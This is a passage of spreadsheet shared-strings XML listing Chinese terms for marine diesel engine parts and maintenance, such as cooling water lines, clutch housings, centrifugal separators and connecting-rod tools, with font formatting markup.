      <t>冷却水管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水接头，齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水接头安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水进口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水三通管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水塔纯净水量</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水套安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水套保护罩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水套和气缸套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水图表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水图表，单独的</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水温度阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水温度计</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水温控阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水温控元件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水系统错误</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水系统故障排除</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水系统清洁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水系统水塔</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水系统图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水系统详细</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水预热器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水主管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却塔</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却系统，常规的</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却系统焊接说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却油出口管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却油出口设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却油出口支管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却油管布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却油管细目</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却油管支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却油进口支管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却油</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却油主管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却罩壳</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器壳体安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器壳体上部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器壳体上部铸件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器壳体下部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器壳体下部铸件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器壳体铸件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器壳体总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器控制部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离合器用执行器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离线</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>PMI</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离心泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离心分离器阀套件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离心分离器盖螺母套件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离心分离器盖套件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离心分离器密封套件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离心分离器转子套件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离心浇铸气缸套质量控制</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离心螺母套件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离心旁通滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离心式滤器布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>梨形环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>力矩扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>力矩扳手上紧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>力矩扳手</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>力矩补偿器工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>力矩补偿器滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>力矩补偿器链轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>力矩补偿器润滑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>力矩补偿器液压拉伸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>力矩补偿器油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>力矩补偿器找正</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>立式千分尺头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>立体图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>立柱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆大端轴承检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆的主尺寸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆吊具附件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆吊具试验规范</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆吊装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆附件起吊</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆和十字头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆和十字头，详细</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆活塞头工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆加工说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆螺钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆螺栓的螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆螺栓螺帽</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆螺栓液压拉紧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆螺栓组合工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆起吊工具总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆升压泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆推力块生产说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维修</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆下方的垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆液压拉伸器</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆液压拉伸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆预加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆质量规程</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆轴承，上部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆轴承，下部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
